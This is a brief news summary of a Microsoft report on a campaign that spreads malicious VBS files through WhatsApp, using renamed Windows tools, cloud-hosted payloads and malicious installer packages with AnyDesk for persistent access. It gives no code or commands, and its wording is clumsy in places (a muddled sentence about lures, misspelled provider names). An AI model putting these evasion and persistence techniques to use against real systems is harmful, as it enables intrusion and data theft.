Microsoft talks about a campaign that uses WhatsApp messages to spread harmful Visual Basic Script (VBS) files. We still don't know who the lures used by the threat actors are. The campaign uses both social engineering and stealth techniques.

It uses renamed Windows tools to act like a normal system, gets payloads from secure cloud services like AWS, Tencent Cloud, and Backblaze B2, and installs harmful Microsoft Installer packages to keep control of the target systems. Microsoft said that using real software and trusted platforms together is a powerful way for threat actors to blend in with normal network activity and greatly improve their chances of success in attacks.

It also said that this campaign shows a complex infection chain that uses social engineering (sending messages through WhatsApp), stealth techniques (renaming real tools and hiding features), and cloud-based payload hosting. This includes real tools like AnyDesk that give attackers permanent remote access, which they can use to steal data or install more malware. They do this by downloading extra VBScript files from AWS S3, Ten Cent Cloud, or Backblazed B2 through renamed binaries.